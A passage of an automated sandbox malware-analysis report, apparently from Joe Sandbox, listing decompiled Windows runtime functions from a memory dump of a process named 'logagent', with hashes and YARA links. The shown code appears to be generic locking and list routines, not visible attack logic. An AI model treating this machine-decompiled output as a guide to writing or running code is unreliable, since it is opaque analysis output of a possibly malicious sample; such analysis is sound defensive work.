                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3803a58494baf063db5f0cbb21377ae4bbb10d3b47faa22d97d22686451986c2
                                              • Instruction ID: 66d9d0940988a12f91a4f55eb53c1494bd011680a8cd136df1ed951005934ac0
                                              • Opcode Fuzzy Hash: 3803a58494baf063db5f0cbb21377ae4bbb10d3b47faa22d97d22686451986c2
                                              • Instruction Fuzzy Hash: 9051A67AF005259FCB28CF1CC4A49BDB7B6FF8870071A845AE866AB354D734AE51C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0527AE44 Relevance: .2, Instructions: 152COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E0527AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0527C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0527ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0527FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0527EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E051D7D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E05271608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E05281536(0x52a8ae4, (_t74 -  *0x52a8b04 >> 0x14) + (_t74 -  *0x52a8b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0527C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0527A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E0525CB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0527ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                              0x0527ae44
                                              0x0527ae4c
                                              0x0527ae53
                                              0x0527ae55
                                              0x0527ae5c
                                              0x0527ae64
                                              0x0527ae68
                                              0x0527ae75
                                              0x0527ae75
                                              0x0527ae78
                                              0x0527ae7a
                                              0x0527ae7c
                                              0x0527ae7f
                                              0x0527aea8
                                              0x0527aeab
                                              0x0527aead
                                              0x00000000
                                              0x00000000
                                              0x0527aeb3
                                              0x0527aeb8
                                              0x0527aebb
                                              0x0527aebd
                                              0x00000000
                                              0x0527ae81
                                              0x0527ae88
                                              0x0527ae8f
                                              0x0527ae9b
                                              0x0527ae96
                                              0x0527ae96
                                              0x0527ae96
                                              0x0527aea0
                                              0x0527aea3
                                              0x0527aebf
                                              0x0527aebf
                                              0x0527aec3
                                              0x0527aec9
                                              0x0527af0d
                                              0x0527af14
                                              0x0527af3d
                                              0x0527af3d
                                              0x0527af41
                                              0x0527af44
                                              0x0527af67
                                              0x0527af67
                                              0x0527af6a
                                              0x0527afca
                                              0x0527afd1
                                              0x00000000
                                              0x0527afd1
                                              0x0527af6c
                                              0x0527af6d
                                              0x0527af75
                                              0x0527af7c
                                              0x0527af7e
                                              0x0527af80
                                              0x0527af85
                                              0x0527af87
                                              0x0527af99
                                              0x0527af89
                                              0x0527af92
                                              0x0527af92
                                              0x0527af9e
                                              0x0527afa1
                                              0x0527afa3
                                              0x0527afa9
                                              0x0527afb0
                                              0x0527afb2
                                              0x0527afb4
                                              0x0527afbc
                                              0x0527afbc
                                              0x0527afb4
                                              0x0527afb0
                                              0x00000000
                                              0x0527afa1
                                              0x0527af4f
                                              0x0527af57
                                              0x0527af5c
                                              0x0527af5e
                                              0x00000000
                                              0x00000000
                                              0x0527af60
                                              0x0527af64
                                              0x0527af64
                                              0x00000000
                                              0x0527af64
                                              0x0527af1a
                                              0x0527af25
                                              0x00000000
                                              0x00000000
                                              0x0527af27
                                              0x0527af28
                                              0x0527af33
                                              0x00000000
                                              0x0527aed0
                                              0x0527aed0
                                              0x0527aed2
                                              0x0527aee1
                                              0x0527aee4
                                              0x00000000
                                              0x00000000
                                              0x0527aee6
                                              0x0527aeec
                                              0x00000000
                                              0x00000000
                                              0x0527aefb
                                              0x0527af07
                                              0x0527afd3
                                              0x0527afdb
                                              0x0527afdb
                                              0x00000000
                                              0x0527af07
                                              0x0527aed6
                                              0x0527aed8
                                              0x0527aedf
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0527aedf
                                              0x0527aec9

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4af91b222b02381be6e298444332e974a1d672ac906876ed552bde1308da67b4
                                              • Instruction ID: 075c5508c73ba4df21d881a1d343125a65985f0e550216a9ec7875dfd085c9ce
                                              • Opcode Fuzzy Hash: 4af91b222b02381be6e298444332e974a1d672ac906876ed552bde1308da67b4
                                              • Instruction Fuzzy Hash: 6B410A7172961A5BC72ADA25C894F3FB39AFF84630F044219F82BC7290D775D801C692
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051DDBE9 Relevance: .1, Instructions: 149COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E051DDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E051BCC50(E051B4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E051D7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E05288ED6(_t102, _t98);
						}
						_t76 = _v44;
						E051D2280(_t58, _v44);
						E051DDD82(_v44, _t102, _t98);
						E051DB944(_t102, _v5);
						return E051CFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x52a8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x52a862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x52a8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x52a862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x527fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                              0x051ddbe9
                                              0x051ddbf2
                                              0x051ddbf7
                                              0x051ddbf9
                                              0x051ddbfc
                                              0x051ddc00
                                              0x051ddc03
                                              0x051ddc14
                                              0x051ddd54
                                              0x051ddd54
                                              0x051ddd54
                                              0x051ddc18
                                              0x051ddc1d
                                              0x051ddc1d
                                              0x051ddc32
                                              0x051ddc3b
                                              0x051ddc3e
                                              0x051ddc46
                                              0x051ddd5b
                                              0x051ddd62
                                              0x051ddd64
                                              0x051ddd67
                                              0x051ddd69
                                              0x051ddd6b
                                              0x051ddd6e
                                              0x051ddd70
                                              0x051ddd73
                                              0x051ddd73
                                              0x00000000
                                              0x051ddc4c
                                              0x051ddc4e
                                              0x05223ae3
                                              0x05223ae8
                                              0x05223aea
                                              0x051ddce7
                                              0x051ddce9
                                              0x051ddcec
                                              0x051ddcee
                                              0x051ddcf0
                                              0x051ddcf3
                                              0x051ddcf5
                                              0x05223af2
                                              0x05223af5
                                              0x05223af5
                                              0x051ddd06
                                              0x051ddd08
                                              0x051ddd0b
                                              0x051ddd12
                                              0x05223b08
                                              0x051ddd18
                                              0x051ddd18
                                              0x051ddd18
                                              0x051ddd20
                                              0x051ddd23
                                              0x05223b16
                                              0x05223b16
                                              0x051ddd29
                                              0x051ddd2d
                                              0x051ddd36
                                              0x051ddd40
                                              0x051ddd51
                                              0x051ddd51
                                              0x051ddc54
                                              0x051ddc59
                                              0x051ddc59
                                              0x051ddc5e
                                              0x051ddc5e
                                              0x051ddc63
                                              0x051ddc66
                                              0x051ddc6b
                                              0x051ddc78
                                              0x051ddc7b
                                              0x051ddc81
                                              0x051ddc81
                                              0x051ddc83
                                              0x051ddc89
                                              0x00000000
                                              0x00000000
                                              0x051ddd7b
                                              0x051ddd7b
                                              0x051ddc8f
                                              0x051ddc8f
                                              0x051ddc92
                                              0x051ddc99
                                              0x051ddc9f
                                              0x051ddca5
                                              0x051ddcaa
                                              0x051ddcaa
                                              0x051ddcb3
                                              0x051ddcb8
                                              0x051ddcbb
                                              0x051ddcc1
                                              0x051ddccf
                                              0x051ddcd2
                                              0x051ddcd5
                                              0x051ddcd7
                                              0x051ddcda
                                              0x051ddcdc
                                              0x051ddcdc
                                              0x051ddce2
                                              0x051ddce4
                                              0x00000000
                                              0x051ddce4

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1161209789f261cd10904e9dd2ba99c416f4324b54df986a1deb57ba611f3ab
                                              • Instruction ID: 5e55b73219afe8f8fa49ecb5530326df33ae3dc99682e03e6f7f565fa1c57dcb
                                              • Opcode Fuzzy Hash: c1161209789f261cd10904e9dd2ba99c416f4324b54df986a1deb57ba611f3ab
                                              • Instruction Fuzzy Hash: 4551B0B5A00619DFCF14CFA8D480AAEFBF6BF48310F21855AD555A7380DB75A944CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 051CEF40 Relevance: .1, Instructions: 147COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E051CEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E051B9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77cfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E051B2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                              0x051cef4b
                                              0x051cef4d
                                              0x051cef57
                                              0x051cf0bd
                                              0x051cf0c2
                                              0x051cf0d2
                                              0x051cf0d2
                                              0x051cf0c2
                                              0x051cef5d
                                              0x051cef5f
                                              0x051cef67
                                              0x051cef6a
                                              0x051cef6d
                                              0x051cef74
                                              0x051cef7f
                                              0x051cef82
                                              0x051cef82
                                              0x051cef86
                                              0x051cef88
                                              0x051cef8c
                                              0x051cef8f
                                              0x051cef8f
                                              0x051cef8f
                                              0x00000000
                                              0x051cef91
                                              0x051cef93
                                              0x051cefc4
                                              0x051cefc4
                                              0x051cefc4
                                              0x051cefca
                                              0x051cefd0
                                              0x051cf0a6
                                              0x00000000
                                              0x00000000
                                              0x051cf0af
                                              0x0521bb06
                                              0x0521bb0a
                                              0x051cf0b5
                                              0x051cf0b5
                                              0x051cf0b5
                                              0x051cf0b5
                                              0x00000000
                                              0x051cefd6
                                              0x051cefd9
                                              0x051cf0de
                                              0x051cf0e2
                                              0x051cefdf
                                              0x051cefdf
                                              0x051cefdf
                                              0x051cefe5
                                              0x0521bafc
                                              0x0521bafc
                                              0x051cefe5
                                              0x051cefeb
                                              0x051cefed
                                              0x051cf00f
                                              0x051cf011
                                              0x051cf01a
                                              0x051cf01d
                                              0x051cf021
                                              0x051cf028
                                              0x051cf029
                                              0x051cf029
                                              0x051cf02c
                                              0x00000000
                                              0x051cf02c
                                              0x051ceff3
                                              0x051ceff9
                                              0x051cf0ea
                                              0x051cf0ed
                                              0x051cf0ef
                                              0x00000000
                                              0x051cf0ef
                                              0x051cf003
                                              0x0521bb12
                                              0x051cf045
                                              0x051cf049
                                              0x051cf051
                                              0x051cf09e
                                              0x051cf0a0
                                              0x051cf0a0
                                              0x051cf09e
                                              0x051cf053
                                              0x051cf064
                                              0x051cf064
                                              0x051cf06b
                                              0x0521bb1a
                                              0x0521bb1a
                                              0x051cf071
                                              0x051cf071
                                              0x051cf07d
                                              0x051cf082
                                              0x051cf08f
                                              0x051cf08f
                                              0x051cf009
                                              0x051cf00d
                                              0x00000000
                                              0x051cf00d
                                              0x051cefd0
                                              0x051cef97
                                              0x051cefa5
                                              0x051cefaa
                                              0x00000000
                                              0x051cefac
                                              0x051cefac
                                              0x051cefac
                                              0x00000000
                                              0x051cefb2
                                              0x051cf036
                                              0x051cf03a
                                              0x051cf040
                                              0x051cf090
                                              0x00000000
                                              0x051cf092
                                              0x051cf042
                                              0x00000000
                                              0x051cf042
                                              0x051cefb7
                                              0x051cefb9
                                              0x051cefbc
                                              0x051cefb0
                                              0x051cefb0
                                              0x00000000
                                              0x051cefbe
                                              0x051cefbe
                                              0x051cefc1
                                              0x00000000
                                              0x051cefc1
                                              0x051cefbc
                                              0x051cefaa
                                              0x051cef91

                                              Memory Dump Source
                                              • Source File: 00000008.00000002.625881473.0000000005190000.00000040.00000800.00020000.00000000.sdmp, Offset: 05190000, based on PE: true
                                              • Associated: 00000008.00000002.626869305.00000000052AB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 00000008.00000002.626998143.00000000052AF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_5190000_logagent.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                              • Instruction ID: 07d249453edc0d8c37bae4b43eb05be906256592274a44aca673903d4980d69b
                                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                              • Instruction Fuzzy Hash: AB51E430A042499FDB25CB68C194BAEBFF3BF25314F1482ECD84557281C37BA99AC751
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0528740D Relevance: .1, Instructions: 141COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E0528740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E0520D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E051FF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L051D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L051D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E051FF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L051D4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                              0x0528740d
                                              0x0528740d
                                              0x05287412
                                              0x05287413
                                              0x05287416
                                              0x05287418
                                              0x0528741c
                                              0x0528741f
                                              0x05287422
                                              0x05287422
                                              0x05287428
                                              0x0528742a
                                              0x0528742a
                                              0x05287451
                                              0x05287432
                                              0x0528744f
                                              0x0528744f
                                              0x00000000
                                              0x05287434
                                              0x05287438
                                              0x05287443
                                              0x05287517
                                              0x05287517
                                              0x0528751a
                                              0x05287535
                                              0x05287520
                                              0x05287527
                                              0x0528752c
                                              0x05287531
                                              0x05287533
                                              0x00000000
                                              0x05287533
                                              0x00000000
                                              0x05287531
                                              0x0528754b
                                              0x0528754f
                                              0x0528755c
                                              0x0528755c
                                              0x0528755f
                                              0x05287560
                                              0x05287561
                                              0x05287562
                                              0x05287563
                                              0x05287568
                                              0x0528756a
                                              0x0528756c
                                              0x0528756d
                                              0x0528756d
                                              0x0528756f
                                              0x05287572
                                              0x05287574
                                              0x05287577
                                              0x0528757c
                                              0x0528757f
                                              0x00000000
                                              0x05287551
                                              0x05287551
                                              0x05287551
                                              0x05287553
                                              0x05287553
                                              0x05287449
                                              0x05287449
                                              0x0528744c
                                              0x0528744c
                                              0x00000000
                                              0x0528744c
                                              0x05287443
                                              0x0528750e
                                              0x05287514
                                              0x05287514
                                              0x05287455
                                              0x05287469
                                              0x0528746d
                                              0x00000000
                                              0x05287473
                                              0x05287473
                                              0x05287476
                                              0x05287480
                                              0x05287484
                                              0x0528748e
                                              0x05287493
                                              0x05287493
                                              0x05287496
                                              0x05287499
                                              0x052874a1
                                              0x052874b1
                                              0x052874b5
                                              0x00000000
                                              0x052874bb
                                              0x052874c1
                                              0x052874c1
                                              0x052874c4
                                              0x052874c5
                                              0x052874c6
                                              0x052874c7
                                              0x052874c8
                                              0x052874cd
                                              0x00000000
                                              0x052874d3
                                              0x052874d3
                                              0x052874d6
                                              0x052874d8
                                              0x052874db
                                              0x052874dd
                                              0x052874e0
                                              0x052874e7
                                              0x052874ee
                                              0x052874ee
                                              0x052874f4
                                              0x052874f9
                                              0x00000000
                                              0x052874fb
                                              0x052874fb
                                              0x052874fd
                                              0x05287500
                                              0x05287503
                                              0x05287505
                                              0x05287505
                                              0x052874f9
                                              0x00000000
                                              0x052874cd
                                              0x052874b5
                                              0x00000000

